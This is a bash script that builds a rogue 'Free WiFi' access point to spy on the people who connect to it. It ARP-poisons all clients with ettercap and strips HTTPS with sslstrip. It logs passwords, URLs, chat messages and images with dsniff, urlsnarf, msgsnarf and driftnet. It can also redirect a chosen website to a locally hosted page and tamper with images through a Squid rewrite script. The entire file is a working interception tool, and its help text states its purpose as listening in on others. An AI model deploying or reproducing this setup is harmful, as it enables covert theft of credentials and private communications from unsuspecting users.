#!/bin/bash # Colored dialogs GREEN="\033[1;32m" RED="\033[1;31m" END="\033[1;37m" clear echo -e "For this to run please ensue that you know what " echo 'card is connected to the internet' echo 'and what card is in Monitor mode' echo # Download and install Apache2 only if it isn't installed if [ -f /usr/sbin/apache2 ] && [ -f /usr/sbin/apache2ctl ];then echo -e ""$GREEN"Apache2 (Web server) found in your system"$END"" echo;else echo -e ""$RED"Installing Apache2 - Web server"$END"" apt-get install -y apache2 apache2-mpm-prefork apache2.2-common echo # apache2 2.2.9-7ubuntu3.2 [45.1kB] # apache2.2-common 2.2.9-7ubuntu3.2 [778kB] # apache2-mpm-prefork 2.2.9-7ubuntu3.2 [236kB] fi # Download and install Mogrify only if it isn't installed if [ -f /usr/bin/mogrify ];then echo -e ""$GREEN"ImageMagick's Mogrify found in your system"$END"";else echo -e ""$RED"Installing ImageMagick"$END"" apt-get install -y imagemagick fi # Download and install Squid3 only if it isn't installed if [ -f /usr/sbin/squid3 ];then echo -e ""$GREEN"Squid3 (Proxy caching server for web clients)" echo -e "found in your system"$END"" echo;else echo -e ""$RED"Installing Squid3 - Proxy caching server for web clients"$END"" apt-get install -y squid3 squid3-common # squid3-common 3.0.STABLE7-1ubuntu1 [225kB] # squid3 3.0.STABLE7-1ubuntu1 [873kB] fi echo 'Setting up the folders...' echo export HOME_DIR="/root/Fake_AP" export TMP_DIR="/root/Fake_AP/tmp/" export DAY_DIR=$HOME_DIR"/$(date +%d-%m-%y_%T)" export REDIR="off" # Making working and backup directory if [ ! -d $HOME_DIR ];then mkdir $HOME_DIR mkdir $TMP_DIR fi touch /var/run/dhcpd.pid && chmod 777 /var/run/dhcpd.pid mkdir $DAY_DIR mkdir $DAY_DIR"/DriftNet" mkdir $DAY_DIR"/Dsniff" mkdir $DAY_DIR"/Ettercap" mkdir $DAY_DIR"/SslStrip" echo -n "Enter the name of the wireless card that is connected to the internet, for example:- wlan0: " read -e wlan export GATEWAY="`/sbin/route | grep 'default'| awk '{print $2}'`" export IPADD="`/sbin/ifconfig $wlan| grep 'inet addr' | awk '{print $2}' | sed -e 's/.*://'`" echo -n "Enter the name of the wireless card that is in monitor mode, for example:- ath0: " read -e MON echo -n "Enter the ESSID you would like your rogue AP to be called, for example:- Free WiFi: " read -e AP modprobe tun #airbase-ng is going to create our fake AP with the SSID we specified xterm -bg black -fg yellow -e airbase-ng -c 6 -e "$AP" $mon & sleep 3 echo Configuring interface created by airdrop-ng ifconfig at0 up ifconfig at0 10.0.0.1 netmask 255.255.255.0 ifconfig at0 mtu 1400 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 echo 'Setting up iptables to handle traffic seen by the airdrop-ng (at0) interface...' echo iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT iptables -t nat -A POSTROUTING -o $wlan -j MASQUERADE echo 'Creating a dhcpd.conf to assign addresses to clients that connect to us...' echo echo "default-lease-time 600;" > $HOME_DIR/dhcpd.conf echo "max-lease-time 720;" >> $HOME_DIR/dhcpd.conf echo "ddns-update-style none;" >> $HOME_DIR/dhcpd.conf echo "authoritative;" >> $HOME_DIR/dhcpd.conf echo "log-facility local7;" >> $HOME_DIR/dhcpd.conf echo "subnet 10.0.0.0 netmask 255.255.255.0 {" >> $HOME_DIR/dhcpd.conf echo "range 10.0.0.100 10.0.0.254;" >> $HOME_DIR/dhcpd.conf echo "option routers 10.0.0.1;" >> $HOME_DIR/dhcpd.conf echo "option domain-name-servers $GATEWAY;" >> $HOME_DIR/dhcpd.conf echo "}" >> $HOME_DIR/dhcpd.conf echo 'DHCP server starting on our airdrop-ng interface (at0)' echo xterm -bg black -fg blue -e dhcpd3 -f -cf $HOME_DIR/dhcpd.conf at0 & echo "Launching DHCP entries log" echo xterm -bg black -fg red -e tail -f /var/log/messages & echo "Launching ettercap, poisoning all hosts on the at0 interface's subnet" echo xterm -bg black -fg white -e ettercap -T -q -p -l $DAY_DIR/Ettercap/ettercap -i at0 // // & sleep 8 echo 'Configuring ip forwarding' echo echo "1" > /proc/sys/net/ipv4/ip_forward echo 'Launching various tools' xterm -rightbar -bg black -fg green -e sslstrip -a -k -f --write $DAY_DIR/SslStrip/ssl.log & xterm -rightbar -bg black -fg green -e urlsnarf -i at0 & xterm -rightbar -bg black -fg green -e dsniff -m -i at0 -d -w $DAY_DIR/Dsniff/dsniff.log & sleep 5 echo showMenu () { clear echo echo "" echo -e " Fake AP Name: ""$RED"$AP"$END" echo -e " IP Address: "$RED"$IPADD""$END" echo -e " Gateway: "$RED"$GATEWAY""$END" if [ "$REDIR" == "on" ];then echo -e " $website being redirected to /Var/www/index.html" fi echo "" echo "" echo " 1) Read Ettercap Log" echo " 2) Read DSniff Log" echo " 3) Start MSN Logger" echo " 4) Start DriftNet" if [ "$REDIR" == "off" ];then echo " 5) Redirect" elif [ "$REDIR" == "on" ];then echo " 5) Turn Redirect Off" fi echo " 6) Flip Images Upside down" echo " 7) Help" echo " 8) Exit" echo } while [ 1 ] do showMenu read CHOICE case "$CHOICE" in "1") echo "Loading up the Ettercap Log"; konsole --noclose -T "Etterlog" -e etterlog -p $DAY_DIR/Ettercap/ettercap.eci ;; "2") echo "Loading up the DSniff Log"; konsole --noclose -T "DSniff" -e dsniff -r $DAY_DIR/Dsniff/dsniff.log ;; "3") xterm -T "IM Chat" -e msgsnarf -i at0 & ;; "4") xterm -rightbar -bg black -fg green -e driftnet -v -a -i at0 -d $TMP_DIR/ & ;; "5") if [ "$REDIR" == "off" ];then clear echo -n "Enter the Website to set as target: " read -e website iptables -t nat -A PREROUTING -p tcp -d $website --dport 80 -j DNAT --to 10.0.0.1:80 /etc/init.d/apache2 start export REDIR="on" echo "" echo "Done..." echo "" echo "All requests for $website will now be redirected to 10.0.0.1/index.html" sleep 5 elif [ "$REDIR" == "on" ];then /etc/init.d/apache2 stop iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT iptables -t nat -A POSTROUTING -o $wlan -j MASQUERADE export REDIR="off" fi ;; "6") cat > /usr/local/bin/redirect.pl << "EOF" #!/usr/bin/perl $|=1; $count = 0; $pid = $$; while (<>) { chomp $_; if ($_ =~ /(.*\.jpg)/i) { $url = $1; system("/usr/bin/wget", "-q", "-O","/var/www/images/$pid-$count.jpg", "$url"); system("/usr/bin/mogrify", "-flip","/var/www/images/$pid-$count.jpg"); print "http://10.0.0.1/images/$pid-$count.jpg\n"; } elsif ($_ =~ /(.*\.gif)/i) { $url = $1; system("/usr/bin/wget", "-q", "-O","/var/www/images/$pid-$count.gif", "$url"); system("/usr/bin/mogrify", "-flip","/var/www/images/$pid-$count.gif"); print "http://10.0.0.1/images/$pid-$count.gif\n"; } elsif ($_ =~ /(.*\.png)/i) { $url = $1; system("/usr/bin/wget", "-q", "-O","/var/www/images/$pid-$count.png", "$url"); system("/usr/bin/mogrify", "-flip","/var/www/images/$pid-$count.png"); print "http://10.0.0.1/images/$pid-$count.png\n"; } elsif ($_ =~ /(.*\.bmp)/i) { $url = $1; system("/usr/bin/wget", "-q", "-O","/var/www/images/$pid-$count.bmp", "$url"); system("/usr/bin/mogrify", "-flip","/var/www/images/$pid-$count.bmp"); print "http://10.0.0.1/images/$pid-$count.bmp\n"; } else { print "$_\n";; } $count++; } EOF # Make it executable chmod 755 /usr/local/bin/redirect.pl if [ ! -d /var/www/images ];then mkdir /var/www/images chown -R www-data:www-data /var/www chmod -R 1777 /var/www usermod -aG proxy www-data;else rm /var/www/images/* fi sed '39s%.*%url_rewrite_program /usr/local/bin/redirect.pl%g' /etc/squid3/squid.conf > /etc/squid3/squid1.conf && mv /etc/squid3/squid1.conf /etc/squid3/squid.conf sed '40s%.*%redirect_children 12%g' /etc/squid3/squid.conf > /etc/squid3/squid1.conf && mv /etc/squid3/squid1.conf /etc/squid3/squid.conf /etc/init.d/apache2 start /etc/init.d/squid3 start iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain echo 1 > /proc/sys/net/ipv4/ip_forward iptables --table nat --append POSTROUTING --out-interface $wlan -j MASQUERADE iptables --append FORWARD --in-interface at0 -j ACCEPT iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $IPADD #Transparent Squid3 iptables -t nat -A PREROUTING -i at0 -p tcp -m tcp --dport 80 -j DNAT --to-destination 10.0.0.1:3128 iptables -t nat -A PREROUTING -i $wlan -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 3128 ;; "7") # Instructions clear echo "Instructions" echo "" echo "This utility is used to create a Fake Access Point." echo "it will allow others to connect to the internet through you" echo "and allow you to listen in to what they are up to" echo "" echo "Once it has been run, it will create a new folder at /root/" echo "in there it will create a DHCPD.CONF file,A TMP directory for the storage" echo "of images from DRIFTNET and a working directoy named with the date and time" echo "of the start of the program. when you close the script all images from TMP" echo "will be moved into the relavant working directory. this is also where all" echo "logs are saved" echo "" echo "Requirments:-" echo "1) You will need to be connected to the internet,either by Lan or Wireless" echo "2) Have another wireless card already set in monitor mode" echo "" echo "How To:-" echo "If you are reading this then you should already have the basics set up" echo "That being a Fake AP set up with a name of your choice" echo "You should be able to have clients connect to it and be issued a IP address" echo "There should also be a number of Xterm windows showing different statistics" echo "I.e. anything being reported by SSLSTRIP,DSNIFF,URLSNARF,ETTERCAP and DHCP Requests" echo "" echo "Along with these instructions on the menu, there is options to read the ouput" echo "from the Ettercap and Dsniff programs" echo "" echo "To start MSGSNARF to listen into various chat programs, although im sure this has" echo "been set up correctly i have not managed to sniff anything yet" echo "" echo "DRIFTNET has been included, All images are automatically saved to the TMP folder" echo "and moved to the working directory on closure of the script." echo "" echo "To enable routing." echo "Once selected it will ask you for a target website. it will then load up Apache2" echo "and redirect any traffic thats destined for the target website to 10.0.0.1. you will" echo "you will have to make sure that you have an index.html page in there for it to work " echo "or it will come up with a 404 page not found error. I am still working on how to send" echo "all traffic to that address, as in a Captive Portal setup" echo "" echo "Press any key to continue" echo -n read ;; "8") echo "******************************************************************"; echo "*******Now Shutting Down All Windows********"; echo "*************And saving logs****************"; echo "******************************************************************"; mv $TMP_DIR*.* $DAY_DIR/DriftNet/ sleep 3 #stop the APACHE server /etc/init.d/apache2 stop #stop squid /etc/init.d/squid3 stop # reset all IPTABLES iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT iptables -t nat -A POSTROUTING -o $wlan -j MASQUERADE sleep 3 killall -9 dhcpd3 airbase-ng ettercap sslstrip driftnet urlsnarf dsniff xterm ; exit 0 ;; esac done